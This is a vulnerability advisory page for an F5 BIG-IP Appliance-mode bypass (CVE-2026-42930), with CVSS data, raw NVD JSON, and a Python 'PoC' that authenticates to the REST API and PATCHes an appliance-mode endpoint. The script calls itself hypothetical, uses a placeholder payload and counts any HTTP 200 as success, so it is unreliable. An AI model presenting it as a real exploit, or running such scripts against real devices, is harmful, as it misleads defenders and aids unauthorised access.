Security Vulnerability Report
中文
CVE-2026-42930 CVSS 8.7 HIGH

CVE-2026-42930

Published: 2026-05-13 16:16:50
Last Modified: 2026-05-13 16:27:11

Description

When running in Appliance mode, an authenticated attacker assigned the 'Administrator' role may be able to bypass Appliance mode restrictions on a BIG-IP system.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

具体受影响版本请参考F5官方文章 K000160876

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # This is a conceptual PoC for CVE-2026-42930 # It demonstrates how an authenticated administrator might attempt to bypass Appliance mode restrictions. target_url = "https://<target-ip>/mgmt/tm/sys/appliance-mode" login_url = "https://<target-ip>/mgmt/shared/authn/login" username = "admin" password = "<password>" session = requests.Session() session.verify = False # Ignore SSL warnings for testing # Step 1: Authenticate payload = { "username": username, "password": password, "loginProviderName": "tmos" } try: resp = session.post(login_url, json=payload) token = resp.json().get('token').get('token') headers = {"X-F5-Auth-Token": token} print("[+] Authentication successful") except Exception as e: print(f"[-] Authentication failed: {e}") exit() # Step 2: Attempt to bypass Appliance Mode restrictions # In a vulnerable version, specific commands might be executable even if Appliance Mode is 'enabled' # This payload simulates checking or modifying a restricted setting. exploit_payload = { # Payload to bypass restriction (hypothetical based on vulnerability description) "command": "modify", "value": "bypassed" } try: # Sending request to restricted endpoint vuln_resp = session.patch(target_url, headers=headers, json=exploit_payload) if vuln_resp.status_code == 200: print("[!] Potential bypass successful! Restriction may have been circumvented.") print(f"Response: {vuln_resp.text}") else: print(f"[-] Request blocked or failed. Status: {vuln_resp.status_code}") except Exception as e: print(f"[-] Exploit attempt failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42930", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:49.777", "lastModified": "2026-05-13T16:27:11.127", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "When running in Appliance mode, an authenticated attacker assigned the 'Administrator' role may be able to bypass Appliance mode restrictions on a BIG-IP system.\n\n Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000160876", "source": "[email protected]"}]}}